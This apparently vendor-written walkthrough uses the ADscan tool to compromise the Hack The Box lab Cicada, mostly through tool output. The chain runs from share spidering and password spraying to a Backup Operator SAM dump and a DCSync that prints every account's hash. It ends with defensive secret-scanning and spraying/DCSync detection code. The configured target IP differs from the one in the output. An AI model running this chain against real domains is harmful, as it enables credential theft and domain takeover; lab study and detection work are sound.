🐛 Cicada - Auto-Pwn Walkthrough
Automatically compromise HTB Cicada using ADscan through SMB share spidering, password spraying, and domain credential dumping
Lab Information
- Platform: Hack The Box
- Machine: Cicada (Retired)
- Difficulty: Easy
- OS: Windows Server 2008 R2
- Domain: cicada.htb
Prerequisites
If this is your first time using ADscan:
- Follow the Getting Started guide to install ADscan.
- Run adscan install to pull the ADscan runtime image.
Before starting this lab, verify your environment:
adscan check
adscan install # if the check reports missing images or Docker issues
Ensure you also have:
- An active VPN connection to the HTB network
- The correct VPN interface up (typically tun0)
Attack Overview
Cicada is vulnerable to:
- SMB Share Enumeration - Discover HR documents and leaked passwords with guest access
- Password Spraying - Use high-confidence passwords to compromise multiple users
- LDAP Metadata Abuse - Steal passwords from descriptive fields (user descriptions)
- Backup Operator Abuse - Use backup-style privileges to dump local SAM and pivot to Domain Admin
- DCSync Credential Dump - Extract all domain account hashes for persistence
Estimated time with ADscan: ~4-5 minutes (automatic mode)
Walkthrough
Step 1: Workspace Setup
Start ADscan and create a dedicated workspace for this lab:
adscan start
If this is your first run (no workspaces yet), ADscan will prompt you to create one.
⚠ No workspaces detected.
Enter name for a new workspace: : cicada
✓ Workspace 'cicada' created
ℹ Loading workspace data from: ~/.adscan/workspaces/cicada
ℹ Variables loaded from ~/.adscan/workspaces/cicada/variables.json
✓ Workspace data successfully processed for ~/.adscan/workspaces/cicada
✓ Workspace 'cicada' selected automatically as it's the only one.
Step 2: Configure Target
Set the scan parameters for Cicada:
(ADscan:cicada ~/.adscan/workspaces/cicada) > set hosts 10.10.10.182
(ADscan:cicada ~/.adscan/workspaces/cicada) > set iface tun0
(ADscan:cicada ~/.adscan/workspaces/cicada) > set auto true
✓ Hosts configured: 10.10.10.182
✓ Interface configured: tun0 with IP: 10.10.14.X
✓ Auto mode configured: True
Scope: Cicada is a multi-stage AD lab where ADscan LITE shines once you have network access to the domain controller over the HTB VPN. From that point it automates guest HR share spidering, multi-step password spraying, Backup Operator abuse, flag capture, and DCSync.
For labs where most of the work is web, reversing, or other non-AD puzzles before any AD service is reachable, see Labs Scope & Coverage to see how ADscan fits into a hybrid workflow.
Step 3: Start Unauthenticated Scan
Launch the initial unauthenticated enumeration:
(ADscan:cicada ~/.adscan/workspaces/cicada) > start_unauth
ADscan first attempts SMB-based discovery (null session, RID cycling) and only pivots to LDAP or authenticated actions once it has a user list or credentials.
3.1 SMB Discovery and User Enumeration
ℹ Starting host detection on 10.129.231.149...
ℹ Starting smb scan
⚠ New domain found: cicada.htb
✓ smb scan finished.
ℹ Checking for null sessions on SMB on the domain cicada.htb
✗ null sessions not accepted for domain cicada.htb.
ℹ Checking RID cycling for guest session
⚠ No output received from NetExec (attempt 1/3). Retrying command...
✓ RID cycling successful with a guest session on domain cicada.htb
ℹ Enumerating users by RID
6 Users found
╭───────┬───────────────────╮
│ Index │ Users │
├───────┼───────────────────┤
│ 1 │ Administrator │
│ 2 │ john.smoulder │
│ 3 │ sarah.dantelia │
│ 4 │ michael.wrightson │
│ 5 │ david.orelious │
│ 6 │ emily.oscars │
╰───────┴───────────────────╯
ℹ Searching for AS-REP roastable users in domain cicada.htb
✗ No asreproastable users found in domain cicada.htb
Do you want to perform password spraying on domain cicada.htb using a with_users session? [y/n] (y): n
- ADscan discovers the cicada.htb domain during the initial SMB scan.
- Null sessions are rejected, so it falls back to RID cycling with a guest session.
- RID cycling enumerates six domain users, giving a solid username list.
- AS-REP roasting is attempted, but no roastable users are found.
- We intentionally skip immediate password spraying with the with_users session to stay closer to the real lab flow.
3.2 Guest Share Enumeration (HR)
ℹ Checking shares access with a null session on domain cicada.htb
✗ null sessions not accepted on any share of cicada.htb
ℹ Checking shares access with a guest session on domain cicada.htb
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ SMB Shares discovered on cicada.htb │
│ (guest session) │
│ │
│ Host Share Permission │
│ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ │
│ 10.129.231.149 HR READ │
│ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
Do you want to search for juicy information in the shares in domain cicada.htb with a guest session (⚠ WARNING: This will be really noisy and will saturate the network in big domains)? [y/n] (y): y
ℹ Searching for interesting file extensions in the shares of domain cicada.htb. This might take a while, please be patient
✗ No files found
ℹ Searching for possible passwords in the shares of domain cicada.htb. This might take a while, please be patient
ℹ Log saved in smb/spidering_passw.log
✓ Credentials found in shares:
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ DOC_CREDENTIALS (1 found) │
│ ┏━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━┓ │
│ ┃ ┃ ┃ ML ┃ ┃ │
│ ┃ # ┃ Value ┃ Confidence ┃ Line ┃ │
│ ┡━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━┩ │
│ │ 1 │ Cicada$M6Corpb*@Lp#nZp!8 │ 99.90% │ 10 │ │
│ └──────┴──────────────────────────┴──────────────┴────────┘ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Password (1 found) │
│ ┏━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━┓ │
│ ┃ ┃ ┃ ML ┃ ┃ │
│ ┃ # ┃ Value ┃ Confidence ┃ Line ┃ │
│ ┡━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━┩ │
│ │ 1 │ Cicada$M6Corpb*@Lp#nZp!8 │ 99.44% │ 10 │ │
│ └──────┴──────────────────────────┴──────────────┴────────┘ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
✓ Credentials saved to smb/spidering/ directory:
ℹ - DOC_CREDENTIALS: smb/spidering/doc_credentials.json
ℹ - Password: smb/spidering/password.json
? Select a password for password spraying (sorted by ML confidence): (Use arrow keys)
» Cicada$M6Corpb*@Lp#nZp!8 [ML: 99.90%]
- Null sessions to shares fail, but guest access is allowed to the HR share.
- ADscan spiders the share and runs its ML-based secret detector over file contents.
- A strong-looking candidate password, Cicada$M6Corpb*@Lp#nZp!8, is found and ranked with very high confidence.
- The credential is stored under smb/spidering/, so the workspace keeps a full audit trail.
- This password is reused in the next step for domain-wide password spraying.
3.3 Password Spraying and Initial Access
ℹ Selected credential for spraying: Cicada$M6Corpb*@Lp#nZp!8
Do you want to perform password spraying on domain cicada.htb using the selected credential? [y/n] (y):
ℹ Performing password spraying on domain cicada.htb with found password...
ℹ Executing spraying command for cicada.htb
⚠ Performing the spraying on cicada.htb. Please be patient (this can take a while)
✓ [!] 2025/12/04 20:03:03 > [+] VALID LOGIN: michael.wrightson@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8
✓ Kerberos TGT created successfully
ℹ Kerberos ticket generated for michael.wrightson@cicada.htb
⚠ LITE mode: 🔒 Trust enumeration requires PRO.
ℹ Starting authenticated enumeration for 'cicada.htb' domain.
ℹ BloodHound data collection for cicada.htb is starting (this might take a while in big domains)
ℹ Running BloodHound collector on the domain cicada.htb (this may take a while)
✓ BloodHound collector executed successfully on the domain cicada.htb.
ℹ Launching BloodHound CE suite...
ℹ BloodHound CE is ready!
Access the UI at: http://localhost:8442/ui/login
ℹ Uploading ZIP file to BloodHound CE automatically
⚠ ZIP file uploaded but ingestion status unclear. Check BloodHound CE UI for details.
ℹ Searching for enabled computers on domain cicada.htb
1 Enabled Computers found
╭───────┬──────────────────────╮
│ Index │ Enabled Computers │
├───────┼──────────────────────┤
│ 1 │ cicada-dc.cicada.htb │
╰───────┴──────────────────────╯
ℹ Executing port scan in domain cicada.htb (this might take a while in big domains)...
✓ Important port scan for the domain completed.
ℹ Creating a list of all enabled users for domain cicada.htb
7 Enabled Users found
╭───────┬───────────────────╮
│ Index │ Enabled Users │
├───────┼───────────────────┤
│ 1 │ Administrator │
│ 2 │ Guest │
│ 3 │ john.smoulder │
│ 4 │ sarah.dantelia │
│ 5 │ michael.wrightson │
│ 6 │ david.orelious │
│ 7 │ emily.oscars │
╰───────┴───────────────────╯
ℹ Creating a list of admin users for domain cicada.htb
2 Admin Users found
╭───────┬───────────────╮
│ Index │ Admin Users │
├───────┼───────────────┤
│ 1 │ Administrator │
│ 2 │ emily.oscars │
╰───────┴───────────────╯
ℹ Creating a list of privileged users for domain cicada.htb
2 Privileged Users found
╭───────┬──────────────────╮
│ Index │ Privileged Users │
├───────┼──────────────────┤
│ 1 │ Administrator │
│ 2 │ emily.oscars │
╰───────┴──────────────────╯
ℹ Enumerating Kerberos delegations in domain cicada.htb
✗ No delegations found in domain.
ℹ Searching for ADCS in domain cicada.htb
✗ ADCS not found in domain cicada.htb
ℹ Searching for kerberoastable users in domain cicada.htb
✗ No kerberoastable users found in domain cicada.htb
ℹ The user michael.wrightson is not in the privileged list of domain cicada.htb
Do you want to enumerate privileges for user michael.wrightson? [y/n]: n
Do you want to perform password spraying on domain cicada.htb using a auth session? [y/n] (y): n
- ADscan validates the sprayed password and logs in as michael.wrightson.
- BloodHound collection and port scanning give an overview of domain computers and topology.
- The enabled and privileged user lists highlight emily.oscars as a key target.
- Since michael.wrightson is not privileged, the workflow pivots to hunting for additional credentials instead of immediately exploiting AD paths.
3.4 LDAP Descriptions → david.orelious
Do you want to perform password spraying on domain cicada.htb using a auth session? [y/n] (y): n
ℹ Searching for user descriptions in domain cicada.htb
✓ Moved UserDesc log to domains/cicada.htb/ldap/descriptions.log
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ │
│ User Descriptions (4 found) │
│ ┏━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ │
│ ┃ # ┃ Username ┃ Description ┃ │
│ ┡━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩ │
│ │ 1 │ Administrator │ Built-in account for administering the computer/domain │ │
│ │ 2 │ Guest │ Built-in account for guest access to the computer/domain │ │
│ │ 3 │ david.orelious │ Just in case I forget my password is aRt$Lp#7t*VQ!3 │ │
│ │ 4 │ krbtgt │ Key Distribution Center Service Account │ │
│ └──────┴────────────────┴──────────────────────────────────────────────────────────┘ │
│ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
✓ [+] Found 1 potential password(s) in user descriptions:
ℹ User: david.orelious - Password: aRt$Lp#7t*VQ!3 (confidence: 76.32%)
✓ Kerberos TGT created successfully
ℹ Kerberos ticket generated for david.orelious@cicada.htb
ℹ The user david.orelious is not in the privileged list of domain cicada.htb
Do you want to enumerate privileges for user david.orelious? [y/n]: y
Do you want to enumerate privileges for user david.orelious on various services on hosts? (⚠ WARNING: This will saturate the network if the number of hosts in domain cicada.htb is very high) [y/n]: y
ℹ Starting smb privilege enumeration for user david.orelious
✗ smb enumeration completed for user david.orelious. No hosts with privileges found.
ℹ Starting winrm privilege enumeration for user david.orelious
✗ winrm enumeration completed for user david.orelious. No hosts with privileges found.
- LDAP descriptions often contain operational notes; here one leaks david.orelious’s password in plain text.
- ADscan automatically extracts that value and tests it, obtaining a TGT for david.orelious.
- Privilege checks confirm he is not privileged and has no direct SMB/WinRM access.
- The account is still useful for expanding share access and discovering more secrets.
3.5 Shares as david.orelious → Second Password
Do you want to enumerate shares for user david.orelious in the domain cicada.htb? [y/n] (y): y
ℹ Checking shares access as user david.orelious in domain cicada.htb
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ SMB Shares discovered on cicada.htb │
│ (david.orelious session) │
│ │
│ Host Share Permission │
│ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ │
│ 10.129.231.149 SYSVOL READ │
│ DEV READ │
│ HR READ │
│ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
Do you want to search for juicy information in the shares in domain cicada.htb with a david.orelious session (⚠ WARNING: This will be really noisy and will saturate the network in big domains)?
[y/n] (y): y
ℹ Searching for possible passwords in the shares of domain cicada.htb. This might take a while, please be patient
ℹ Log saved in smb/spidering_passw.log
✓ Credentials found in shares:
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ CMD ConvertTo-SecureString (1 found) │
│ ┏━━━━━━┳━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━┓ │
│ ┃ ┃ ┃ ML ┃ ┃ │
│ ┃ # ┃ Value ┃ Confidence ┃ Line ┃ │
│ ┡━━━━━━╇━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━┩ │
│ │ 1 │ Q!3@Lp#M6b*7t*Vt │ 99.99% │ 8 │ │
│ └──────┴──────────────────┴──────────────┴────────┘ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ DOC_CREDENTIALS (1 found) │
│ ┏━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━┓ │
│ ┃ ┃ ┃ ML ┃ ┃ │
│ ┃ # ┃ Value ┃ Confidence ┃ Line ┃ │
│ ┡━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━┩ │
│ │ 1 │ Cicada$M6Corpb*@Lp#nZp!8 │ 99.90% │ 12 │ │
│ └──────┴──────────────────────────┴──────────────┴────────┘ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Password (1 found) │
│ ┏━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━┓ │
│ ┃ ┃ ┃ ML ┃ ┃ │
│ ┃ # ┃ Value ┃ Confidence ┃ Line ┃ │
│ ┡━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━┩ │
│ │ 1 │ Cicada$M6Corpb*@Lp#nZp!8 │ 99.44% │ 12 │ │
│ └──────┴──────────────────────────┴──────────────┴────────┘ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
✓ Credentials saved to smb/spidering/ directory:
ℹ - DOC_CREDENTIALS: smb/spidering/doc_credentials.json
ℹ - CMD ConvertTo-SecureString: smb/spidering/cmd_convertto-securestring.json
ℹ - Password: smb/spidering/password.json
? Select a password for password spraying (sorted by ML confidence): (Use arrow keys)
» Q!3@Lp#M6b*7t*Vt [ML: 99.99%]
Cicada$M6Corpb*@Lp#nZp!8 [ML: 99.90%]
- With david.orelious’s access, ADscan can spider additional shares and spot PowerShell ConvertTo-SecureString usage.
- The secure-string call reveals a new, highly ranked password, Q!3@Lp#M6b*7t*Vt.
- Both this and the earlier Cicada password are saved into the workspace’s smb/spidering/ JSON files.
- ADscan selects the new password as the best candidate for another round of domain-wide spraying.
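The secret hunting ADscan ran over the HR share, the LDAP description attribute and the scripts on DEV is, from the defender's side, an audit worth running before a guest session gets there. The following is an added example and not ADscan's code or its ML model: a keyword/entropy heuristic over exported description attributes and script text, with constructed sample inputs (the script and HR note are assumed content, not the lab's files).

```python
"""Audit AD user descriptions and share files for password-like strings.

Added example, not ADscan's code: a keyword/entropy heuristic standing in for
the ML secret detector, run over exported description attributes and script
text so a defender finds the leak before a guest session does.
"""
import math
import re
from dataclasses import dataclass

# "password is X", "pwd: X", "passwd=X" ...
KEYWORD_RE = re.compile(r"(?i)\b(?:password|passwd|pwd)\b\W+(?:is\W+)?(\S+)")
# A literal turned into a SecureString is still a literal in the script file.
SECURESTRING_RE = re.compile(
    r"(?i)ConvertTo-SecureString\s+(['\"])([^'\"]+)\1\s+-AsPlainText")

@dataclass
class Finding:
    source: str    # "ldap:<sAMAccountName>" or a share-relative file path
    line_no: int
    secret: str
    reason: str

def shannon_entropy(token: str) -> float:
    """Bits per character: ~2 for a dictionary word, >3.3 for random strings."""
    n = len(token)
    return -sum(k / n * math.log2(k / n)
                for k in (token.count(c) for c in set(token)))

def looks_like_password(token: str) -> bool:
    """At least 8 chars, three character classes and high entropy."""
    token = token.rstrip(".,;:")
    if len(token) < 8:
        return False
    classes = sum(any(f(c) for c in token)
                  for f in (str.islower, str.isupper, str.isdigit,
                            lambda c: not c.isalnum()))
    return classes >= 3 and shannon_entropy(token) >= 3.0

def scan_text(source: str, text: str) -> list:
    """Return a Finding for every line of `text` that seems to carry a secret."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = SECURESTRING_RE.search(line)
        if m:
            findings.append(Finding(source, line_no, m.group(2),
                                    "ConvertTo-SecureString -AsPlainText literal"))
            continue
        m = KEYWORD_RE.search(line)
        if m and looks_like_password(m.group(1)):
            findings.append(Finding(source, line_no, m.group(1).rstrip(".,;:"),
                                    "password keyword + high-entropy token"))
    return findings

def scan_user_descriptions(descriptions: dict) -> list:
    """`descriptions` maps sAMAccountName -> description attribute value."""
    out = []
    for user, desc in descriptions.items():
        out.extend(scan_text(f"ldap:{user}", desc))
    return out

# Constructed input: the four descriptions shown on this page plus a benign
# one that mentions "password" without leaking anything.
SAMPLE_DESCRIPTIONS = {
    "Administrator": "Built-in account for administering the computer/domain",
    "Guest": "Built-in account for guest access to the computer/domain",
    "david.orelious": "Just in case I forget my password is aRt$Lp#7t*VQ!3",
    "krbtgt": "Key Distribution Center Service Account",
    "sarah.dantelia": "Reset your password at the helpdesk portal",
}
# Constructed script and HR note (assumed content, not the lab's files).
SAMPLE_SCRIPT = (
    "$user = 'emily.oscars'\n"
    "$pw = ConvertTo-SecureString 'Q!3@Lp#M6b*7t*Vt' -AsPlainText -Force\n"
    "$cred = New-Object System.Management.Automation.PSCredential($user, $pw)\n"
)
SAMPLE_HR_NOTE = "Welcome aboard!\nYour default password is: Cicada$M6Corpb*@Lp#nZp!8\n"
```

Pointing `scan_text` at a recursive walk of the share and `scan_user_descriptions` at an LDAP export gives the same three findings this walkthrough reached with guest and david.orelious sessions, without needing either.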
3.6 Second Spraying and Flag Capture
ℹ Selected credential for spraying: Q!3@Lp#M6b*7t*Vt
⚠ Note: 2 credentials were found. Only the selected credential will be used for automated spraying. All credentials have been saved to smb/spidering/ directory. You can manually perform password
spraying with the other credentials later, but be careful not to lock accounts. Wait at least 1 hour between password spraying attempts (or as specified in the password policy).
Do you want to perform password spraying on domain cicada.htb using the selected credential? [y/n] (y):
ℹ Performing password spraying on domain cicada.htb with found password...
ℹ Executing spraying command for cicada.htb
⚠ Performing the spraying on cicada.htb. Please be patient (this can take a while)
✓ [!] 2025/12/04 20:06:05 > [+] VALID LOGIN: emily.oscars@cicada.htb:Q!3@Lp#M6b*7t*Vt
✓ Kerberos TGT created successfully
ℹ Kerberos ticket generated for emily.oscars@cicada.htb
⚠ The user emily.oscars is in the privileged list of domain cicada.htb
⚠ User emily.oscars has elevated privileges in the domain (adminCount=1).
⚠ The user emily.oscars is a member of the Backup Operators group
⚠ User has winrm access to the PDC, dumping SAM through winrm
ℹ Dumping SAM credentials from host 10.129.231.149 in domain cicada.htb
⚠ Hash found from SAM dump - Local User: Administrator, NT Hash: 2b87e7c93a3e8a0ea4a581937016f341
✗ Logon failure for local user 'administrator' on host '10.129.231.149' via smb. Incorrect credentials.
ℹ Trying with domain credentials instead...
ℹ Kerberos ticket generated for administrator@cicada.htb
⚠ The user administrator is in the privileged list of domain cicada.htb
⚠ User administrator has elevated privileges in the domain (adminCount=1).
⚠ The user administrator is a member of the Domain Admins group
╭──────────────── Domain Compromised ────────────────╮
│ │
│ Domain cicada.htb compromised in 5.61 minute(s). │
│ │
╰────────────────────────────────────────────────────╯
⚠ SMB/RPC port 445 is closed on the PDC. Unable to use 'net time' fallback.
⚠ Failed to synchronize clock with PDC 10.129.231.149
ℹ Obtaining flags from domain cicada.htb
Flags in domain cicada.htb
╭──────┬───────────────────────────────────────────────┬──────────────────────────────────╮
│ Type │ Path │ Flag │
├──────┼───────────────────────────────────────────────┼──────────────────────────────────┤
│ user │ C:\Users\emily.oscars.CICADA\Desktop\user.txt │ ef26403104395d504f47871b801e5694 │
│ root │ C:\Users\Administrator\Desktop\root.txt │ 5da453656222f948c5ebb48a7c2bb6f0 │
╰──────┴───────────────────────────────────────────────┴──────────────────────────────────╯
ℹ User flag saved to: /root/.adscan/workspaces/cicada/flags/user.txt
ℹ Root flag saved to: /root/.adscan/workspaces/cicada/flags/root.txt
- Spraying with Q!3@Lp#M6b*7t*Vt compromises emily.oscars, a Backup Operator with WinRM access to the DC.
- ADscan abuses backup-style privileges to dump the local SAM and turns the Administrator hash into Domain Admin access.
- Once administrator@cicada.htb is obtained, ADscan captures both flags and the domain is fully owned.
3.7 Complete Credential Dump (DCSync)
Do you want to perform a DCSync in domain cicada.htb? [y/n]: y
Specify the user to extract NTLM hashes from (type 'All' for all users) (Administrator): All
ℹ Performing DCSync for all users
✗ Something went wrong while executing credential extraction. Reattempting with another method...
✓ Found credential: cicada.htb/Administrator with hash 2b87e7c93a3e8a0ea4a581937016f341
✓ Found credential: cicada.htb/krbtgt with hash 3779000802a4bb402736bee52963f8ef
✓ Found credential: cicada.htb/john.smoulder with hash 0d33a055d07e231ce088a91975f28dc4
✓ Found credential: cicada.htb/sarah.dantelia with hash d1c88b5c2ecc0e2679000c5c73baea20
✓ Found credential: cicada.htb/michael.wrightson with hash b222964c9f247e6b225ce9e7c4276776
✓ Found credential: cicada.htb/david.orelious with hash ef0bcbf3577b729dcfa6fbe1731d5a43
✓ Found credential: cicada.htb/emily.oscars with hash 559048ab2d168a4edf8e033d43165ee5
✓ DCSync completed successfully.
ℹ Extracted 7 domain credentials.
Extracted credentials for domain cicada.htb
╭───────────────────┬──────────────────────────────────╮
│ User │ Credential │
├───────────────────┼──────────────────────────────────┤
│ Administrator │ 2b87e7c93a3e8a0ea4a581937016f341 │
│ krbtgt │ 3779000802a4bb402736bee52963f8ef │
│ john.smoulder │ 0d33a055d07e231ce088a91975f28dc4 │
│ sarah.dantelia │ d1c88b5c2ecc0e2679000c5c73baea20 │
│ michael.wrightson │ b222964c9f247e6b225ce9e7c4276776 │
│ david.orelious │ ef0bcbf3577b729dcfa6fbe1731d5a43 │
│ emily.oscars │ 559048ab2d168a4edf8e033d43165ee5 │
╰───────────────────┴──────────────────────────────────╯
- As a final step, ADscan performs a full DCSync to dump all domain account hashes.
- Even if the first attempt fails, it transparently retries with a different method until extraction succeeds.
- The final credential table gives a complete view of all domain users and hashes for reporting and follow-up analysis.
Attack Chain Breakdown
- Technique: SMB spidering with guest session
- Outcome: ML classifier identifies strong password Cicada$M6Corpb*@Lp#nZp!8 in HR documents.
- Technique: Domain password spraying with a single high-confidence credential
- Outcome: Compromise of michael.wrightson, plus full BloodHound / user enumeration.
- Technique: LDAP description field hunting
- Outcome: Cleartext password for david.orelious, new TGT and expanded share access.
- Technique: Parsing ConvertTo-SecureString usage in scripts on SYSVOL/DEV/HR
- Outcome: Second strong password Q!3@Lp#M6b*7t*Vt extracted and validated.
- Technique: Password spraying with new credential, SAM dump via WinRM, hash re-use as domain credential
- Outcome: emily.oscars compromise, then administrator@cicada.htb TGT and full domain control.
- Technique: Automated flag retrieval and DCSync with Administrator rights
- Outcome: User and root flags stored under the Cicada workspace, plus hashes for all 7 domain accounts.
Timing Breakdown
Automatic mode (set auto True):
- SMB discovery + RID cycling + guest HR spidering: ~60–90 seconds
- First password spray (Cicada$…) + BloodHound collection: ~60–90 seconds
- LDAP description hunting + david.orelious TGT + share spidering: ~60 seconds
- Second password spray (Q!3@…) + SAM dump + flags: ~60–90 seconds
- Full DCSync of 7 accounts: ~30 seconds
- Total (observed): ~5–6 minutes (domain compromise banner: 5.61 minutes)
Semi-automatic mode (set auto False):
- Add ~2–3 minutes for manual confirmations and branching decisions
- Total (typical): ~7–9 minutes
Manual time: ~60–120 minutes | ADscan time: ~5–6 minutes
Troubleshooting
LDAP anonymous bind fails
Verify LDAP port accessibility:
nmap -p 389,636 10.10.10.182
# Should show open ports
SMB access denied
Ensure credentials are correctly formatted:
# In ADscan
creds show
# Verify no encoding issues with passwords
Clock skew errors
Synchronize time with target DC:
sudo ntpdate 10.10.10.182
# Kerberos requires time sync within 5 minutes
Key Learning Points
What ADscan Automated
- Reconnaissance: SMB host detection, RID cycling, and guest share spidering
- Initial Access: Password discovery in HR documents and LDAP descriptions
- Lateral Movement: Password spraying to compromise multiple user accounts
- Privilege Escalation: Abuse of Backup Operator privileges and SAM dumping
- Post-Exploitation: DCSync-based credential harvesting for all domain accounts
Security Lessons
- LDAP hardening: Disable anonymous binds and restrict readable attributes
- Descriptive fields: Avoid storing passwords or hints in user descriptions or comments
- Secure storage: Never store passwords in scripts, documents, or logs in cleartext
- Backup privileges: Backup Operators effectively hold powerful lateral-movement and privilege-escalation capabilities
- Defense detection: Monitor for unusual password spraying, share spidering, and DCSync activity
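Two of the detection points above are concrete enough to encode as rules. This added example (not ADscan's or the walkthrough's code) runs them over constructed Windows Security event records with simplified field names: many distinct accounts failing from one client address in a short window (spraying), and a 4662 event carrying the replication control-access rights from an account that is not an allowlisted DC (DCSync). The source IP and timestamps are constructed.

```python
"""Detect password spraying and DCSync in Windows Security events.

Added example, not ADscan's or the walkthrough's code: two detection rules
over constructed event records with simplified field names (IpAddress,
TargetUserName, SubjectUserName, Properties are the real XML element names).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Control-access-right GUIDs listed in a 4662 'Properties' field when an
# account requests replication data from a DC, which is what DCSync does.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}

def detect_spraying(events, window=timedelta(minutes=2), min_users=5):
    """One client address failing against many distinct accounts quickly.

    Looks at 4771 (Kerberos pre-auth failed) and 4625 (logon failure). A spray
    causes one failure per account, so per-account lockout thresholds miss it.
    Returns [(ip, sorted_users)], one alert per offending source."""
    by_source = defaultdict(list)
    for e in events:
        if e["EventID"] in (4625, 4771):
            by_source[e["IpAddress"]].append((e["Time"], e["TargetUserName"]))
    alerts = []
    for src, tries in by_source.items():
        tries.sort()
        start = 0
        for end in range(len(tries)):          # sliding time window
            while tries[end][0] - tries[start][0] > window:
                start += 1
            users = {u for _, u in tries[start:end + 1]}
            if len(users) >= min_users:
                alerts.append((src, sorted(users)))
                break
    return alerts

def detect_dcsync(events, dc_accounts):
    """Accounts other than allowlisted DCs that used replication rights (4662).

    A real deployment also allowlists directory-sync service accounts."""
    allow = {a.upper() for a in dc_accounts}
    return sorted({e["SubjectUserName"] for e in events
                   if e["EventID"] == 4662
                   and REPLICATION_GUIDS & set(e.get("Properties", ()))
                   and e["SubjectUserName"].upper() not in allow})

def _t(hms):
    """Constructed timestamps on the date of the walkthrough's spray."""
    return datetime.strptime(f"2025-12-04 {hms}", "%Y-%m-%d %H:%M:%S")

# Constructed sample: one password tried against the six RID-cycled users;
# five fail (4771) and michael.wrightson gets a TGT (4768), then two 4662s.
SAMPLE_EVENTS = [
    {"EventID": 4771, "Time": _t("20:03:00") + timedelta(seconds=i),
     "IpAddress": "10.10.14.7", "TargetUserName": u}
    for i, u in enumerate(("Administrator", "john.smoulder", "sarah.dantelia",
                           "david.orelious", "emily.oscars"))
] + [
    {"EventID": 4768, "Time": _t("20:03:03"), "IpAddress": "10.10.14.7",
     "TargetUserName": "michael.wrightson"},
    # Routine replication by the DC's own machine account: must not alert.
    {"EventID": 4662, "Time": _t("20:10:00"), "SubjectUserName": "CICADA-DC$",
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]},
    # DCSync run as Administrator, as in 3.7: must alert.
    {"EventID": 4662, "Time": _t("20:11:30"), "SubjectUserName": "Administrator",
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
]

if __name__ == "__main__":
    print(detect_spraying(SAMPLE_EVENTS))                # one alert for 10.10.14.7
    print(detect_dcsync(SAMPLE_EVENTS, {"CICADA-DC$"}))  # ['Administrator']
```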